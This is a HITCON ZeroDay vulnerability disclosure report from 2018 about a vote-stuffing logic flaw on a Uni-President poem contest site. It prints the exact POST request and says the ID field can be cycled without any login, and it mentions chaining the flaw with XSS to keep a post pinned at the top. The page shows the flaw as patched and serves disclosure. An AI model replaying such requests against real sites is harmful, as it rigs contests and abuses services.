統一集團 五四為愛發聲比賽頁面 可以灌票 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2018-00664
  •  發信 Vendor: 統一企業股份有限公司
  • Title: 統一集團 五四為愛發聲比賽頁面 可以灌票
  • Introduction: 邏輯漏洞

處理狀態

目前狀態

公開
Last Update : 2018/07/13
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 未複測
  • 公開

處理歷程

  • 2018/05/10 08:25:18 : 新提交 (由 鄉民 更新此狀態)
  • 2018/05/10 17:28:42 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/05/13 17:06:44 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/05/13 17:07:04 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/05/13 17:07:04 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/07/02 12:52:57 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/07/02 12:52:57 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/07/05 14:27:45 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/07/13 03:00:16 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2018-00664
  • 通報者:鄉民
  • 風險:低
  • 類型:其他 (Other)

參考資料

暫無資料
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

http://54poem.com.tw/poems/vote

敘述

POST /poems/vote HTTP/1.1
Host: 54poem.com.tw
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://54poem.com.tw/poems
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 39
Connection: close

fbid=0&id=3021&type=vote&ci_csrf_token=

fbid 可以隨便填,使用流水號直接洗下去
配合 XSS 的弱點,可以讓攻擊文章永遠置頂

而且此漏洞不用登入 Facebook(即無任何驗證)即可一直洗

擷圖

留言討論

聯絡企業

 發送私人訊息
您也可以透過私人訊息的方式與企業聯繫,討論有關於這個漏洞的相關資訊。